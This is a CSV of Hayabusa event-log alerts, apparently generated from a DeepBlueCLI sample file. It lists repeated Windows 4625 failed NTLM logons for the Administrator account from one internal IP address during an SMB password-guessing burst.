2016-09-20 01:52:21.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NiVgC8oJ5W2Xr3t0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hXfhdrbLnNOGDqy6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OcjMGbrHQHxIhSSh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LDYPTYHHKAe39GjM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2PF3H6LE6MqFjVWx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.526 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LLTReOoxRa7UAhT3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jqtqwAPBiBfaHNpv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jmisFXzDpOILUhIX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: W5UHqVVAYK08FWit  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PKHLHN59FDnD92Sm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.829 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ohAKPRGvg1JCQ91y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pxdcrng84HEG39nJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.926 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lFGXFxHPbxDTGmiN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tyFnafBgzoLQWTQR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2IjLjxkd2pX4moFy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9vqYC4KotCYTcQv5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qtHcYFIOHglQFb60  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mmiHIQrpsAVRJtdb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4TdkChjMAviJ6jr8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.283 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sPIGU1rBk0F5cG9P  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8ScynGWKK3CtoUsi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0E4JAuxC8MuuGfnw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4aDJtqsUWKyuDqBq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yCFrEHUgqCtKPybS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2ftrEBfaLGbboV8D  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: thle3slH6gZYllyQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PcEnabS7oj98WI0e  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EBqGp9CD4A9PsyLk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iil8dQlzMCkKRNUb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.735 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nDBqxF9bmNNjNdsm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QJNBRV3BRVEN8hmG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OGl1Tbdw7PDvVsRR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uspHTc4JwnjjZQti  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.930 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8Exq3nfy1LeFOPcA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vdFC4g7vsLO0zOzL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HpdCohLheoqQ6DXw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xHS3sclMwgHuH8rE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sNSheImuQwgOEH5g  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GX5y374mlYYXbAB2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eaFRL6q9KQY5bFHZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.230 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MrkEyJmfLiSrvQGs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Fd1vJiJa3pdjqdQV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RVrZl3LOIa7VLhT7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TKR8KbyQkwRX1qTE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GY22XuDxbE5lvEra  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4AntiX3j9HLHcOOq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XIvMbod41WeNADy5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0UL4lb3CCrv7YfGQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OyRktDjPqFyrdSTQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HKEGmAH8Wbc7f3jC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 06Dfi4lO2Vdw3gCr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 29eXmenUTACkAHKC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2Zq7Gl6hnKDJJqFc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jKENlWYt6m78taZR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.863 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 822SUU2Hg6w6AqQh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bROU0Mk9Z4yEq323  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EKfVPleDpLLqkuKq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NGWVqbchMitnLVYT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.086 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y7K9vifU9lWwpP9J  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oIgKYj210JfICJXv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jisuKilPQivTV8yE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hckyoom0XnqpRzK8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: De0l6qgcuhMERjMY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.343 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SSa7pylPWn8jl2Ox  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ol9OntO4hqidlNUi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kXOBF0ZWLxMauHuT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WVBFJltkR5vnmpYD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.554 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kHVXEHq9zNYdfTpZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OIw3BxmLsfwDXXFg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.647 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hhgRhjnhkRJus4fw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xz78guWXrekEvuFT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 04wNT26RJmriQrfH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XmbuuymdSpfNldt2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
